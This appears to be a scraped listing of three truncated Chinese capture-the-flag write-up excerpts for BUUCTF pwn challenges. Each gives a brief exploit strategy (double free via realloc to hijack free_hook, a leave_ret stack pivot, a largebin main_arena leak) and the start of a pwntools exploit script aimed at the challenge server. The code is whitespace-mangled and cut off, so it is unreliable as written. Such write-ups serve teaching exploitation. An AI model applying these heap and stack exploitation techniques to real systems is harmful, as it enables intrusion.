接着利用realloc来达成double free劫持free hook即可 frompwnimport*#p=process('./ciscn_2019_es_5')p=remote('node3.buuoj.cn',29806) libc=ELF('/lib/x86_64-linux-gnu/libc-2.27.so') text='choice:'defcreate(size,content): p.recvuntil('choice:') p.sendline('1') p.recvuntil('size?>')...
(在vul初下断点,n 到第一个read函数 输入后 查看栈) 1frompwnimport*23r=remote('',28459)4elf=ELF('./ciscn_s_4')56sys=0x80484007leave_ret=0x080484b88payload='a'*0x27+'b'9r.send(payload)10r.recvuntil('b')1112stack=u32(r.recv(4))13s_addr=stack-0x3814#payload1 将s的0x28个内存...
思路就是构造一个largebin释放之后求出mian_arena,然后算出偏移,打free_hook from pwn import* p = remote("node3.buuoj.cn",25789) #p = process("./ciscn_2019_es_1") #context.log_level = 'debug' def add(size,name,call): p.recv() p.sendline("1") p.recv() p.sendline(str(size))...